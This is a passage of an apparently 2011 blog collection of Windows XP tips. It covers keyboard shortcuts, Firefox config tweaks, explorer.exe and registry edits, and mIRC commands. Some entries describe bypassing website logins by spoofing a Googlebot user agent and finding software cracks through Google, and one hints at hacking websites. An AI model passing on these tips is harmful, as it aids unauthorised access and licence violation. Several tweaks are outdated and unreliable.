  2741. Display the items in the active list. F4
  2742. Open a folder one level up if a folder is selected in the Save As or Open dialog box. BACKSPACE
  2743.  
  2744. If you have a Microsoft Natural Keyboard, or any other compatible keyboard that includes the Windows logo key and the Application key , you can use these keyboard shortcuts:
  2745.  
  2746.  
  2747. Display or hide the Start menu. WIN Key
  2748. Display the System Properties dialog box. WIN Key+BREAK
  2749. Show the desktop. WIN Key+D
  2750. Minimize all windows. WIN Key+M
  2751. Restores minimized windows. WIN Key+Shift+M
  2752. Open My Computer. WIN Key+E
  2753. Search for a file or folder. WIN Key+F
  2754. Search for computers. CTRL+WIN Key+F
  2755. Display Windows Help. WIN Key+F1
  2756. Lock your computer if you are connected to a network domain, or switch users if you are not connected to a network domain. WIN Key+ L
  2757. Open the Run dialog box. WIN Key+R
  2758. Open Utility Manager. WIN Key+U
  2759.  
  2760. accessibility keyboard shortcuts:
  2761.  
  2762. Switch FilterKeys on and off. Right SHIFT for eight seconds
  2763. Switch High Contrast on and off. Left ALT+left SHIFT+PRINT SCREEN
  2764. Switch MouseKeys on and off. Left ALT +left SHIFT +NUM LOCK
  2765. Switch StickyKeys on and off. SHIFT five times
  2766. Switch ToggleKeys on and off. NUM LOCK for five seconds
  2767. Open Utility Manager. WIN Key+U
  2768.  
  2769. shortcuts you can use with Windows Explorer:
  2770.  
  2771.  
  2772. Display the bottom of the active window. END
  2773. Display the top of the active window. HOME
  2774. Display all subfolders under the selected folder. NUM LOCK+ASTERISK on numeric keypad (*)
  2775. Display the contents of the selected folder. NUM LOCK+PLUS SIGN on numeric keypad (+)
  2776. Collapse the selected folder. NUM LOCK+MINUS SIGN on numeric keypad (-)
  2777. Collapse current selection if it's expanded, or select parent folder. LEFT ARROW
  2778. Display current selection if it's collapsed, or select first subfolder. RIGHT ARROW
  2779. original from : http://www.the-cybers-skills.blogspot.com
  2780. Firefox Speed Tweaks
  2781. Saturday, September 17, 2011 2:31 AM
  2782. Yes, firefox is already pretty damn fast but did you know that you can tweak it and improve the speed even more?
  2783.  
  2784. That's the beauty of this program being open source.
  2785. Here's what you do:
  2786. In the URL bar, type “about:config” and press enter. This will bring up the configuration “menu” where you can change the parameters of Firefox.
  2787.  
  2788. Note that these are what I’ve found to REALLY speed up my Firefox significantly - and these settings seem to be common among everybody else as well. But these settings are optimized for broadband connections - I mean with as much concurrent requests we’re going to open up with pipelining… lol… you’d better have a big connection.
  2789.  
  2790. Double Click on the following settins and put in the numbers below - for the true / false booleans - they’ll change when you double click.
  2791.  
  2792. Code:
  2793. browser.tabs.showSingleWindowModePrefs – true
  2794. network.http.max-connections – 48
  2795. network.http.max-connections-per-server – 16
  2796. network.http.max-persistent-connections-per-proxy – 8
  2797. network.http.max-persistent-connections-per-server – 4
  2798. network.http.pipelining – true
  2799. network.http.pipelining.maxrequests – 100
  2800. network.http.proxy.pipelining – true
  2801. network.http.request.timeout – 300
  2802.  
  2803.  
  2804. One more thing… Right-click somewhere on that screen and add a NEW -> Integer. Name it “nglayout.initialpaint.delay” and set its value to “0”. This value is the amount of time the browser waits before it acts on information it receives. Since you’re broadband - it shouldn’t have to wait.
  2805.  
  2806. Now you should notice you’re loading pages MUCH faster now!
  2807. original from : http://www.the-cybers-skills.blogspot.com
  2808. See Secure Sites
  2809. Saturday, September 17, 2011 2:31 AM
  2810. Cant See Secure Sites
  2811.  
  2812. Fix the problem with seeing them secrue sites (banks or online stores) i found this very usefull to me at my work (isp backbone support lol, at the time i was regular support  )
  2813.  
  2814. Any way... what u need to do is make a new notepad file and write in it the followng DLL's.. just copy-paste these
  2815.  
  2816.  
  2817.  
  2818. regsvr32 SOFTPUB.DLL
  2819. regsvr32 WINTRUST.DLL
  2820. regsvr32 INITPKI.DLL
  2821. regsvr32 dssenh.dll
  2822. regsvr32 Rsaenh.dll
  2823. regsvr32 gpkcsp.dll
  2824. regsvr32 sccbase.dll
  2825. regsvr32 slbcsp.dll
  2826. regsvr32 Cryptdlg.dll
  2827.  
  2828.  
  2829. and save it as > all file types, and make it something like securefix.bat.
  2830.  
  2831. then just run the file and ur problem shuld be gone.
  2832. original from : http://www.the-cybers-skills.blogspot.com
  2833. Change Text on XP Start Button
  2834. Saturday, September 17, 2011 2:31 AM
  2835. Step 1 - Modify Explorer.exe File
  2836.  
  2837. In order to make the changes, the file explorer.exe located at C:\Windows needs to be edited. Since explorer.exe is a binary file it requires a special editor. For purposes of this article I have used Resource Hacker. Resource HackerTM is a freeware utility to view, modify, rename, add, delete and extract resources in 32bit Windows executables and resource files (*.res). It incorporates an internal resource script compiler and decompiler and works on Microsoft Windows 95/98/ME, Windows NT, Windows 2000 and Windows XP operating systems.
  2838.  
  2839. get this from h**p://delphi.icm.edu.pl/ftp/tools/ResHack.zip
  2840.  
  2841. The first step is to make a backup copy of the file explorer.exe located at C:\Windows\explorer. Place it in a folder somewhere on your hard drive where it will be safe. Start Resource Hacker and open explorer.exe located at C:\Windows\explorer.exe.
  2842.  
  2843. The category we are going to be using is "String Table". Expand it by clicking the plus sign then navigate down to and expand string 37 followed by highlighting 1033. If you are using the Classic Layout rather than the XP Layout, use number 38. The right hand pane will display the stringtable. We’re going to modify item 578, currently showing the word “start” just as it displays on the current Start button.
  2844.  
  2845. There is no magic here. Just double click on the word “start” so that it’s highlighted, making sure the quotation marks are not part of the highlight. They need to remain in place, surrounding the new text that you’ll type. Go ahead and type your new entry. In my case I used Click Me!
  2846.  
  2847. You’ll notice that after the new text string has been entered the Compile Script button that was grayed out is now active. I won’t get into what’s involved in compiling a script, but suffice it to say it’s going to make this exercise worthwhile. Click Compile Script and then save the altered file using the Save As command on the File Menu. Do not use the Save command – Make sure to use the Save As command and choose a name for the file. Save the newly named file to C:\Windows.
  2848.  
  2849.  
  2850. Step 2 – Modify the Registry
  2851.  
  2852. !!!make a backup of your registry before making changes!!!
  2853.  
  2854. Now that the modified explorer.exe has been created it’s necessary to modify the registry so the file will be recognized when the user logs on to the system. If you don’t know how to access the registry I’m not sure this article is for you, but just in case it’s a temporary memory lapse, go to Start (soon to be something else) Run and type regedit in the Open field. Navigate to:
  2855.  
  2856. HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Winlogon
  2857.  
  2858. In the right pane, double click the "Shell" entry to open the Edit String dialog box. In Value data: line, enter the name that was used to save the modified explorer.exe file. Click OK.
  2859.  
  2860. Close Registry Editor and either log off the system and log back in, or reboot the entire system if that’s your preference. If all went as planned you should see your new Start button with the revised text.[/b]
  2861. original from : http://www.the-cybers-skills.blogspot.com
  2862. Change Your Ip In Less Then 1 Minute
  2863. Saturday, September 17, 2011 2:31 AM
  2864. How To: Change Your Ip In Less Then 1 Minute
  2865.  
  2866. 1. Click on "Start" in the bottom left hand corner of screen
  2867. 2. Click on "Run"
  2868. 3. Type in "command" and hit ok
  2869.  
  2870. You should now be at an MSDOS prompt screen.
  2871.  
  2872. 4. Type "ipconfig /release" just like that, and hit "enter"
  2873. 5. Type "exit" and leave the prompt
  2874. 6. Right-click on "Network Places" or "My Network Places" on your desktop.
  2875. 7. Click on "properties"
  2876.  
  2877. You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.
  2878.  
  2879. 8. Right click on "Local Area Connection" and click "properties"
  2880. 9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
  2881. 10. Click on "Use the following IP address" under the "General" tab
  2882. 11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
  2883. 12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
  2884. 13. Hit the "Ok" button here
  2885. 14. Hit the "Ok" button again
  2886.  
  2887. You should now be back to the "Local Area Connection" screen.
  2888.  
  2889. 15. Right-click back on "Local Area Connection" and go to properties again.
  2890. 16. Go back to the "TCP/IP" settings
  2891. 17. This time, select "Obtain an IP address automatically"
  2892. tongue.gif 18. Hit "Ok"
  2893. 19. Hit "Ok" again
  2894. 20. You now have a new IP address
  2895.  
  2896. With a little practice, you can easily get this process down to 15 seconds.
  2897.  
  2898. P.S:
  2899. This only changes your dynamic IP address, not your ISP/IP address. If you plan on hacking a website with this trick be extremely careful, because if they try a little, they can trace it back
  2900. original from : http://www.the-cybers-skills.blogspot.com
  2901. Disable The Send Error Report, to Microsoft
  2902. Saturday, September 17, 2011 2:31 AM
  2903. To disable the stupid feature in WinXP which tries to send a report to microsoft every time a program crashes you will have to do this:
  2904.  
  2905. *************************************************************************
  2906.  
  2907. Open Control Panel
  2908. Click on Preformance and Maintenance.
  2909. Click on System.
  2910. Then click on the Advanced tab
  2911. Click on the error reporting button on the bottom of the windows.
  2912. Select Disable error reporting.
  2913. Click OK
  2914. Click OK
  2915.  
  2916. *************************************************************************
  2917. original from : http://www.the-cybers-skills.blogspot.com
  2918. All General Keyboard Shortcuts
  2919. Saturday, September 17, 2011 2:31 AM
  2920. General Keyboard Shortcuts, General Keyboard Shortcuts
  2921.  
  2922. General Keyboard Shortcuts
  2923. CTRL+C (Copy)
  2924. CTRL+X (Cut)
  2925. CTRL+V (Paste)
  2926. CTRL+Z (Undo)
  2927. DELETE (Delete)
  2928. SHIFT+DELETE (Delete the selected item permanently without placing the item in the Recycle Bin)
  2929. CTRL while dragging an item (Copy the selected item)
  2930. CTRL+SHIFT while dragging an item (Create a shortcut to the selected item)
  2931. F2 key (Rename the selected item)
  2932. CTRL+RIGHT ARROW (Move the insertion point to the beginning of the next word)
  2933. CTRL+LEFT ARROW (Move the insertion point to the beginning of the previous word)
  2934. CTRL+DOWN ARROW (Move the insertion point to the beginning of the next paragraph)
  2935. CTRL+UP ARROW (Move the insertion point to the beginning of the previous paragraph)
  2936. CTRL+SHIFT with any of the arrow keys (Highlight a block of text)
  2937. SHIFT with any of the arrow keys (Select more than one item in a window or on the desktop, or select text in a document)
  2938. CTRL+A (Select all)
  2939. F3 key (Search for a file or a folder)
  2940. ALT+ENTER (View the properties for the selected item)
  2941. ALT+F4 (Close the active item, or quit the active program)
  2942. ALT+ENTER (Display the properties of the selected object)
  2943. ALT+SPACEBAR (Open the shortcut menu for the active window)
  2944. CTRL+F4 (Close the active document in programs that enable you to have multiple documents open simultaneously)
  2945. ALT+TAB (Switch between the open items)
  2946. ALT+ESC (Cycle through items in the order that they had been opened)
  2947. F6 key (Cycle through the screen elements in a window or on the desktop)
  2948. F4 key (Display the Address bar list in My Computer or Windows Explorer)
  2949. SHIFT+F10 (Display the shortcut menu for the selected item)
  2950. ALT+SPACEBAR (Display the System menu for the active window)
  2951. CTRL+ESC (Display the Start menu)
  2952. ALT+Underlined letter in a menu name (Display the corresponding menu)
  2953. Underlined letter in a command name on an open menu (Perform the corresponding command)
  2954. F10 key (Activate the menu bar in the active program)
  2955. RIGHT ARROW (Open the next menu to the right, or open a submenu)
  2956. LEFT ARROW (Open the next menu to the left, or close a submenu)
  2957. F5 key (Update the active window)
  2958. BACKSPACE (View the folder one level up in My Computer or Windows Explorer)
  2959. ESC (Cancel the current task)
  2960. SHIFT when you insert a CD-ROM into the CD-ROM drive (Prevent the CD-ROM from automatically playing)
  2961. Dialog Box Keyboard Shortcuts
  2962. CTRL+TAB (Move forward through the tabs)
  2963. CTRL+SHIFT+TAB (Move backward through the tabs)
  2964. TAB (Move forward through the options)
  2965. SHIFT+TAB (Move backward through the options)
  2966. ALT+Underlined letter (Perform the corresponding command or select the corresponding option)
  2967. ENTER (Perform the command for the active option or button)
  2968. SPACEBAR (Select or clear the check box if the active option is a check box)
  2969. Arrow keys (Select a button if the active option is a group of option buttons)
  2970. F1 key (Display Help)
  2971. F4 key (Display the items in the active list)
  2972. BACKSPACE (Open a folder one level up if a folder is selected in the Save As or Open dialog box)
  2973. Microsoft Natural Keyboard Shortcuts
  2974. Windows Logo (Display or hide the Start menu)
  2975. Windows Logo+BREAK (Display the System Properties dialog box)
  2976. Windows Logo+D (Display the desktop)
  2977. Windows Logo+M (Minimize all of the windows)
  2978. Windows Logo+SHIFT+M (Restore the minimized windows)
  2979. Windows Logo+E (Open My Computer)
  2980. Windows Logo+F (Search for a file or a folder)
  2981. CTRL+Windows Logo+F (Search for computers)
  2982. Windows Logo+F1 (Display Windows Help)
  2983. Windows Logo+ L (Lock the keyboard)
  2984. Windows Logo+R (Open the Run dialog box)
  2985. Windows Logo+U (Open Utility Manager)
  2986. Accessibility Keyboard Shortcuts
  2987. Right SHIFT for eight seconds (Switch FilterKeys either on or off)
  2988. Left ALT+left SHIFT+PRINT SCREEN (Switch High Contrast either on or off)
  2989. Left ALT+left SHIFT+NUM LOCK (Switch the MouseKeys either on or off)
  2990. SHIFT five times (Switch the StickyKeys either on or off)
  2991. NUM LOCK for five seconds (Switch the ToggleKeys either on or off)
  2992. Windows Logo +U (Open Utility Manager)
  2993. Windows Explorer Keyboard Shortcuts
  2994. END (Display the bottom of the active window)
  2995. HOME (Display the top of the active window)
  2996. NUM LOCK+Asterisk sign (*) (Display all of the subfolders that are under the selected folder)
  2997. NUM LOCK+Plus sign (+) (Display the contents of the selected folder)
  2998. NUM LOCK+Minus sign (-) (Collapse the selected folder)
  2999. LEFT ARROW (Collapse the current selection if it is expanded, or select the parent folder)
  3000. RIGHT ARROW (Display the current selection if it is collapsed, or select the first subfolder)
  3001. Shortcut Keys for Character Map
  3002. After you double-click a character on the grid of characters, you can move through the grid by using the keyboard shortcuts:
  3003. RIGHT ARROW (Move to the right or to the beginning of the next line)
  3004. LEFT ARROW (Move to the left or to the end of the previous line)
  3005. UP ARROW (Move up one row)
  3006. DOWN ARROW (Move down one row)
  3007. PAGE UP (Move up one screen at a time)
  3008. PAGE DOWN (Move down one screen at a time)
  3009. HOME (Move to the beginning of the line)
  3010. END (Move to the end of the line)
  3011. CTRL+HOME (Move to the first character)
  3012. CTRL+END (Move to the last character)
  3013. SPACEBAR (Switch between Enlarged and Normal mode when a character is selected)
  3014. Microsoft Management Console (MMC) Main Window Keyboard Shortcuts
  3015. CTRL+O (Open a saved console)
  3016. CTRL+N (Open a new console)
  3017. CTRL+S (Save the open console)
  3018. CTRL+M (Add or remove a console item)
  3019. CTRL+W (Open a new window)
  3020. F5 key (Update the content of all console windows)
  3021. ALT+SPACEBAR (Display the MMC window menu)
  3022. ALT+F4 (Close the console)
  3023. ALT+A (Display the Action menu)
  3024. ALT+V (Display the View menu)
  3025. ALT+F (Display the File menu)
  3026. ALT+O (Display the Favorites menu)
  3027. MMC Console Window Keyboard Shortcuts
  3028. CTRL+P (Print the current page or active pane)
  3029. ALT+Minus sign (-) (Display the window menu for the active console window)
  3030. SHIFT+F10 (Display the Action shortcut menu for the selected item)
  3031. F1 key (Open the Help topic, if any, for the selected item)
  3032. F5 key (Update the content of all console windows)
  3033. CTRL+F10 (Maximize the active console window)
  3034. CTRL+F5 (Restore the active console window)
  3035. ALT+ENTER (Display the Properties dialog box, if any, for the selected item)
  3036. F2 key (Rename the selected item)
  3037. CTRL+F4 (Close the active console window. When a console has only one console window, this shortcut closes the console)
  3038. Remote Desktop Connection Navigation
  3039. CTRL+ALT+END (Open the Microsoft Windows NT Security dialog box)
  3040. ALT+PAGE UP (Switch between programs from left to right)
  3041. ALT+PAGE DOWN (Switch between programs from right to left)
  3042. ALT+INSERT (Cycle through the programs in most recently used order)
  3043. ALT+HOME (Display the Start menu)
  3044. CTRL+ALT+BREAK (Switch the client computer between a window and a full screen)
  3045. ALT+DELETE (Display the Windows menu)
  3046. CTRL+ALT+Minus sign (-) (Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PRINT SCREEN on a local computer.)
  3047. CTRL+ALT+Plus sign (+) (Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing ALT+PRINT SCREEN on a local computer.)
  3048. Microsoft Internet Explorer Navigation
  3049. CTRL+B (Open the Organize Favorites dialog box)
  3050. CTRL+E (Open the Search bar)
  3051. CTRL+F (Start the Find utility)
  3052. CTRL+H (Open the History bar)
  3053. CTRL+I (Open the Favorites bar)
  3054. CTRL+L (Open the Open dialog box)
  3055. CTRL+N (Start another instance of the browser with the same Web address)
  3056. CTRL+O (Open the Open dialog box, the same as CTRL+L)
  3057. CTRL+P (Open the Print dialog box)
  3058. CTRL+R (Update the current Web page)
  3059. CTRL+W (Close the current window)
  3060. original from : http://www.the-cybers-skills.blogspot.com
  3061. Converting Hard drive to NTFS
  3062. Saturday, September 17, 2011 2:31 AM
  3063. Converting to NTFS
  3064.  
  3065. Your hard drive must be formatted with a file system such as FAT, FAT32 or NTFS so that Windows can be installed on to it. This system determines how files are named, organised and stored on the drive. If you’re not using it already, NTFS (New Technology File System) is recommended for Windows XP because of the additional functionality it offers. If your PC came with Windows XP pre-installed then there’s a chance that you’re already using NTFS. If you’ve upgraded from Windows 98 or Windows Me you may still be using FAT or FAT 32. The option to change over to NTFS would have been available during the upgrade process. Don’t worry if you skipped this as it’s possible to convert at any time from within Windows XP without losing any data.
  3066.  
  3067. The recommended option
  3068. There are a number of features in Windows XP that will only work if the NTFS file system is present, which is why it’s suggested you make use of it. File and folder permissions, encryption and privacy options are just some of those you’ll be able to access. In particular, those of you who have set up user accounts will find NTFS invaluable. For instance, if you continue to use FAT or FAT32 anyone with physical access to the drive will be able to access the files and folders that are stored there. However, with NTFS you’ll be able to use a level of encryption (Professional Edition only) that will enable you to protect your data.
  3069.  
  3070. You’ll also find NTFS more reliable in that it’s more able to recover from disk errors than its FAT or FAT32 counterparts. A log of all disk activity is kept so should a crash occur, Windows XP can use this information to repair the file system when your PC boots up again. To find out what file system you’re using, open My Computer, right-click your main hard drive and choose Properties. Take a look at the General tab to see confirmation of the file system that’s in use.
  3071.  
  3072. Convert now
  3073. You can use the convert tool in Windows XP to change the file system on your hard disk from FAT or FAT32 to NTFS. The whole process is safe and your existing data won’t be destroyed. To begin, click Start -> Run, type cmd and press [Return]. At the command prompt type convert c: /fs:ntfs and press [Return] (where ‘c’ is the letter of the drive you’re converting). When you try and run the convert utility, it’s likely that Windows XP will be using your paging file so the process won’t be completed immediately. Therefore, you’ll see a brief message on screen informing you that the conversion will take place instead the next time Windows starts up. Having restarted, the Check Disk utility will run, the conversion will be performed automatically and you may find that your PC will reboot twice more.
  3074.  
  3075. The benefits
  3076. With your drive now running NTFS, it’s time to take advantage of the new options that are available. Having created a number of different user accounts you can now control the level of access that’s granted to individual users. For example, there are going to be certain files and folders that you’ll want some users to be able to access but not others. If you have Windows XP Professional Edition you can do this immediately.
  3077.  
  3078. Right-click any file or folder, choose Properties and select the Security tab. A dialog will be displayed showing the names of all your users. Alongside will be two columns which enable you to select levels of access for each of them, the permissions include Full Control, Modify, Read and Write. You can then check the appropriate box to determine whether or not to Allow or Deny a particular permission. For Windows XP Home Edition users, the Security tab won’t be immediately available. To access this option you’ll need to restart your PC, pressing [F8] until a menu appears. Next select Safe Mode and wait for Windows XP to start up. You can then set your options in the same way.
  3079.  
  3080. Another feature is NTFS compression. It’s quick and seamless as your file or folder is decompressed automatically when you access it. (Don’t confuse this with a Zip compression utility where the files need to be extracted before they can be accessed.) Although you may have used NTFS compression on a file or folder, there’s no way of telling just by looking at it. To remedy this, open My Computer, click Tools -> Folder Options and select the View tab. Under Advanced settings, scroll down and check the option ‘Show encrypted or compressed NTFS files in color’, then click Apply and OK. Take a look at your compressed items in My Computer and you’ll see the text label has changed from black to blue. Something else that’s exclusive to Professional Edition users is the Encrypting File System (EFS). You can use this to protect your important data so that no one else can read it. Your encrypted files and folders will only be accessible when you have logged into your user account successfully.
  3081. original from : http://www.the-cybers-skills.blogspot.com
  3082. Free Access To Websites Without Registering
  3083. Saturday, September 17, 2011 2:31 AM
  3084. Go to
  3085.  
  3086. -http://bugmenot.com/
  3087.  
  3088. and type the URL of the website you want to log into.
  3089. Examples:
  3090.  
  3091. -http://www.nytimes.com/, -http://www.winnetmag.com/
  3092. etcetera.
  3093.  
  3094. Another (and better) way is changing the user agent of your browser to:
  3095. Googlebot/2.1+
  3096.  
  3097. -http://www.googlebot.com/bot.html
  3098.  
  3099. This is very easy in Mozilla's Firefox. Download and install the User Agent Switcher from
  3100.  
  3101. -http://www.chrispederick.com/work/firefox/useragentswitcher/
  3102. and add the Googlebot user agent.
  3103.  
  3104. Have fun, Dead Dreamer!
  3105.  
  3106. -]Edit[- Now this kicks ass, was just browsing entire forum without even needing to login to view restricted areas, and it works on other sites
  3107. And no, you cant access the hidden forums either, already tried that
  3108. original from : http://www.the-cybers-skills.blogspot.com
  3109. All mIRC Commands
  3110. Saturday, September 17, 2011 2:31 AM
  3111. / :Recalls the previous command entered in the current window.
  3112.  
  3113. /! :Recalls the last command typed in any window.
  3114.  
  3115. /action {action text} :Sends the specifed action to the active channel or query window.
  3116.  
  3117. /add [-apuce] {filename.ini} :Loads aliases, popups, users, commands, and events.
  3118.  
  3119. /ame {action text} :Sends the specifed action to all channels which you are currently on.
  3120.  
  3121. /amsg {text} :Sends the specifed message to all channels which you are currently on.
  3122.  
  3123. /auser {level} {nick|address} :Adds a user with the specified access level to the remote users
  3124. list.
  3125.  
  3126. /auto [on|off|nickname|address] :Toggles auto-opping of a nick or address or sets it on or off
  3127. totally.
  3128.  
  3129. /away {away message} :Sets you away leave a message explaining that you are not currently paying
  3130. attention to IRC.
  3131.  
  3132. /away :Sets you being back.
  3133.  
  3134. /ban [#channel] {nickname} [type] :Bans the specified nick from the curent or given channel.
  3135.  
  3136. /beep {number} {delay} :Locally beeps 'number' times with 'delay' in between the beeps. /channel
  3137. Pops up the channel central window (only works in a channel).
  3138.  
  3139. /clear :Clears the entire scrollback buffer of the current window.
  3140.  
  3141. /ctcp {nickname} {ping|finger|version|time|userinfo|clientinfo} :Does the given ctcp request on
  3142. nickname.
  3143.  
  3144. /closemsg {nickname} :Closes the query window you have open to the specified nick.
  3145.  
  3146. /creq [ask | auto | ignore] :Sets your DCC 'On Chat request' settings in DCC/Options.
  3147.  
  3148. /dcc send {nickname} {file1} {file2} {file3} ... {fileN} :Sends the specified files to nick.
  3149.  
  3150. /dcc chat {nickname} :Opens a dcc window and sends a dcc chat request to nickname.
  3151.  
  3152. /describe {#channel} {action text} :Sends the specifed action to the specified channel window.
  3153.  
  3154. /dde [-r] {service} {topic} {item} [data] :Allows DDE control between mIRC and other
  3155. applications.
  3156.  
  3157. /ddeserver [on [service name] | off] :To turn on the DDE server mode, eventually with a given
  3158. service name.
  3159.  
  3160. /disable {#groupname} :De-activates a group of commands or events.
  3161.  
  3162. /disconnect :Forces a hard and immediate disconnect from your IRC server. Use it with care.
  3163.  
  3164. /dlevel {level} :Changes the default user level in the remote section.
  3165.  
  3166. /dns {nickname | IP address | IP name} :Uses your providers DNS to resolve an IP address.
  3167.  
  3168. /echo [nickname|#channel|status] {text} :Displays the given text only to YOU on the given place
  3169. in color N.
  3170.  
  3171. /enable {#groupname} :Activates a group of commands or events.
  3172.  
  3173. /events [on|off] :Shows the remote events status or sets it to listening or not.
  3174.  
  3175. /exit :Forces mIRC to closedown and exit.
  3176.  
  3177. /finger :Does a finger on a users address.
  3178.  
  3179. /flood [{numberoflines} {seconds} {pausetime}] :Sets a crude flood control method.
  3180.  
  3181. /fsend [on|off] :Shows fsends status and allows you to turn dcc fast send on or off.
  3182.  
  3183. /fserve {nickname} {maxgets} {homedirectory} [welcome text file] :Opens a fileserver.
  3184.  
  3185. /guser {level} {nick} [type] :Adds the user to the user list with the specified level and
  3186. address type.
  3187.  
  3188. /help {keyword} :Brings up the Basic IRC Commands section in the mIRC help file.
  3189.  
  3190. /ignore [on|off|nickname|address] :Toggles ignoring of a nick or address or sets it on or off
  3191. totally.
  3192.  
  3193. /invite {nickname} {#channel} :Invites another user to a channel.
  3194.  
  3195. /join {#channel} :Makes you join the specified channel.
  3196.  
  3197. /kick {#channel} {nickname} :Kicks nickname off a given channel.
  3198.  
  3199. /list [#string] [-min #] [-max #] :Lists all currently available channels, evt. filtering for
  3200. parameters.
  3201.  
  3202. /log [on|off] :Shows the logging status or sets it on or off for the current window.
  3203.  
  3204. /me {action text} :Sends the specifed action to the active channel or query window.
  3205.  
  3206. /mode {#channel|nickname} [[+|-]modechars [parameters]] :Sets channel or user modes.
  3207.  
  3208. /msg {nickname} {message} :Send a private message to this user without opening a query window.
  3209.  
  3210. /names {#channel} :Shows the nicks of all people on the given channel.
  3211.  
  3212. /nick {new nickname} :Changes your nickname to whatever you like.
  3213.  
  3214. /notice {nick} {message} :Send the specified notice message to the nick.
  3215.  
  3216. /notify [on|off|nickname] :Toggles notifying you of a nick on IRC or sets it on or off totally.
  3217.  
  3218. /onotice [#channel] {message} :Send the specified notice message to all channel ops.
  3219.  
  3220. /omsg [#channel] {message} :Send the specified message to all ops on a channel.
  3221.  
  3222. /part {#channel} :Makes you leave the specified channel.
  3223.  
  3224. /partall :Makes you leave all channels you are on.
  3225.  
  3226. /ping {server address} :Pings the given server. NOT a nickname.
  3227.  
  3228. /play [-c] {filename} [delay] :Allows you to send text files to a window.
  3229.  
  3230. /pop {delay} [#channel] {nickname} :Performs a randomly delayed +o on a not already opped nick.
  3231.  
  3232. /protect [on|off|nickname|address] :Toggles protection of a nick or address or sets it on or off
  3233. totally.
  3234.  
  3235. /query {nickname} {message} :Open a query window to this user and send them the private message.
  3236.  
  3237. /quit [reason] :Disconnect you from IRC with the optional byebye message.
  3238.  
  3239. /raw {raw command} :Sends any raw command you supply directly to the server. Use it with care!!
  3240.  
  3241. /remote [on|off] :Shows the remote commands status or sets it to listening or not.
  3242.  
  3243. /rlevel {access level} :Removes all users from the remote users list with the specified access
  3244. level.
  3245.  
  3246. /run {c:\path\program.exe} [parameters] :Runs the specified program, evt. with parameters.
  3247.  
  3248. /ruser {nick[!]|address} [type] :Removes the user from the remote users list.
  3249.  
  3250. /save {filename.ini} :Saves remote sections into a specified INI file.
  3251.  
  3252. /say {text} :Says whatever you want to the active window.
  3253.  
  3254. /server [server address [port] [password]] :Reconnects to the previous server or a newly
  3255. specified one.
  3256.  
  3257. /sound [nickname|#channel] {filename.wav} {action text} :Sends an action and a fitting sound.
  3258.  
  3259. /speak {text} :Uses the external text to speech program Monologue to speak up the text.
  3260.  
  3261. /sreq [ask | auto | ignore] :Sets your DCC 'On Send request' settings in DCC/Options.
  3262.  
  3263. /time :Tells you the time on the server you use.
  3264.  
  3265. /timer[N] {repetitions} {interval in seconds} {command} [| {more commands}] :Activates a timer.
  3266.  
  3267. /topic {#channel} {newtopic} :Changes the topic for the specified channel.
  3268.  
  3269. /ulist [{|}]{level} :Lists all users in the remote list with the specified access levels.
  3270.  
  3271. /url [-d] :Opens the URL windows that allows you to surf the www parallel to IRC.
  3272.  
  3273. /uwho [nick] :Pops up the user central with information about the specified user.
  3274.  
  3275. /who {#channel} :Shows the nicks of all people on the given channel.
  3276.  
  3277. /who {*address.string*} :Shows all people on IRC with a matching address.
  3278.  
  3279. /whois {nickname} :Shows information about someone in the status window.
  3280.  
  3281. /whowas {nickname} :Shows information about someone who -just- left IRC.
  3282.  
  3283. /wavplay {c:\path\sound.wav} :Locally plays the specified wave file.
  3284.  
  3285. /write [-cidl] {filename} [text] :To write the specified text to a .txt file.
  3286.  
  3287.  
  3288. MoViEBoT #xdcc-help /server irc.atomic-irc.net
  3289.  
  3290. I strive to make IRC easier for you!
  3291. original from : http://www.the-cybers-skills.blogspot.com
  3292. Customize XP START button
  3293. Saturday, September 17, 2011 2:31 AM
  3294. First you need a tool called "Resource Hacker". This free program allows you to change resources in any .exe file such as "Explorer.exe", which includes the [Start] button's Label. You can visit Download.com and search there for "Resource Hacker".
  3295. After you download it, follow the guide here:
  3296.  
  3297. Step 1:
  3298.  
  3299. A - Run "Resource Hacker" and open the file "%windir%\Explorer.exe".
  3300. B - You see a Tree of all Resources in this file, expand the "String Table"
  3301. C - Find the "start" and replace it with your own text. then press the [Compile Script] button.
  3302. D - Save "Explorer.exe" as "MyStart.exe" DONT save it as Explorer.exe, do "save as.." and give it a new name.
  3303. E - Quit "Resource Hacker".
  3304.  
  3305. Step 2:
  3306.  
  3307. A - Click on the [Start] button and choose the "Run..." item from the start menu. (Or use the shortcut key WinKey+R)
  3308. B - Type "RegEdit" in the Run "Dialog Box". And then press the [Ok] buton to run the "Registry Editor" program.
  3309. C - Go to: "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon" and find the "Shell" property.
  3310. D - Replace value of the "Shell" property to "MyStart.exe".
  3311. E - Quit "Registry Editor".
  3312. F - Restart your system.
  3313.  
  3314. Note about Registry Editor:
  3315. if you did not find the key "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon", you can search the Registry for the "Explorer.exe", to do this use the Edit Menu | Find Next (Ctrl+F).
  3316.  
  3317.  
  3318. AmirBehzad Eslami's site has a handy tool for altering your start button, which makes life much easier, you can find his site here:
  3319. h**p://www.startbtn.main-page.com
  3320. original from : http://www.the-cybers-skills.blogspot.com
  3321. Google Search Cracking
  3322. Saturday, September 17, 2011 2:31 AM
  3323. just type crack: app name
  3324.  
  3325. example: crack: flashget 1.6a
  3326.  
  3327.  
  3328. http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=crack%3A+flashget+1.6a
  3329. original from : http://www.the-cybers-skills.blogspot.com
  3330. How Long Has Your System Been Running
  3331. Saturday, September 17, 2011 2:31 AM
  3332. How Long Has Your System Been Running?
  3333.  
  3334. Here's how you verify system uptime:
  3335.  
  3336. Click Start | Run and type cmd to open a command prompt.
  3337. At the prompt, type systeminfo
  3338.  
  3339. Scroll down the list of information to the line that says System Up Time.
  3340.  
  3341. This will tell you in days, hours, minutes and seconds how long the system has been up.
  3342.  
